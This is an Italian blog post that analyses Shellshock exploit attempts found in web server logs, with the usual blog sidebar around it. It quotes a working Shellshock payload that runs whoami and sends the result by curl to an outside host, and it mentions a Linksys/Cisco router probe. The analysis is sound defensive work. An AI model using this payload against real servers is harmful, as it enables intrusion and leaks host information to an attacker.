Come prevedibile si cominciano a vedere passare nei log dei server i tentativi di utilizzare la vulnerabilita' di Bash ShellShock
Ecco come si presenta un tentativo di exploit
(la riga xxxxxx.org indica il nome del server che e' sottoposto ad attacco)
xx.xxx.xx.xxx - - [05/Oct/2014:11:53:00 +0200] "GET / HTTP/1.1" 200 88868 "-" "() { :;}; /bin/bash -c \"curl http://ntontomou.com/custom/ping.php?domain=xxxxxxxxxx.org\\&whoami=`whoami`\""
in pratica si tratta di una enumerazione piu' che di un attacco. Lo script controlla se la macchina e' vulnerabile a ShellShock ed in caso positivo si collega al sito ntontomou.com aggiornando la pagina ping.php per creare un elenco
La cosa interessante e' che oltre al nome del dominio viene passato anche il risultato del comando whoami credo per mostrare con che utente viene gestito il webserver (tipo www-data)
Cercando tracce di ShellShock ho trovato anche questa richiesta
xx.xxxx.xxx.xxx - - [29/Sep/2014:11:53:39 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 519 "-" "-"
da una ricerca non si tratta di una scansione ShellShock ma si cerca di sfruttare una vulnerabilita' di router Cisco o Linksys (peccato che le macchine scansionate siano tutte Linux)
Iscriviti a:
Commenti sul post (Atom)
Frane con rete DeepLabV3
Aggiornamento Per usare la GPU T4 sono migrato su Google Colab Per avere Keras 3 sono state fatte le seguenti modifiche ! pip install keras ...
-
Per lo shield WiFly e' stata effettuata la patch descritta qui Per la connessione del lettore Rfid si usano i seguenti pin VCC ... -
Questo post e' a seguito di quanto gia' visto nella precedente prova Lo scopo e' sempre il solito: creare un sistema che permet... -
In questo post viene indicato come creare uno scatterplot dinamico basato da dati ripresi da un file csv (nel dettaglio il file csv e' c...
Nessun commento:
Posta un commento